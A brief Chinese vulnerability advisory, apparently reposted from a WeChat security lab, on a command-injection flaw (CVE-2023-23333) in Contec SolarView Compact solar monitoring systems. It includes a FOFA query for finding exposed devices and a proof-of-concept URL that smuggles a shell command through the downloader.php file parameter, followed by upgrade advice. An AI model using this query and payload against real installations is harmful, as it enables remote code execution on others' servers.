漏洞简介
Contec SolarView Compact 是日本 Contec 公司的一个应用系统,提供光伏发电测量系统。其6.00版本以前存在命令注入漏洞,攻击者可以通过 downloader.php 绕过内部限制执行命令,通过该漏洞在服务器端任意执行代码,获取服务器权限。
影响版本
SolarView Compact <= 6.00FOFA语句
body="SolarView Compact" && title="Top"
漏洞复现
抓包,替换POC
downloader.php?file=%3Bpwd%00.zip
修复建议
升级版本至最新
原文始发于微信公众号(巢安实验室):CVE-2023-23333—SolarView Compact RCE 任意命令执行
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论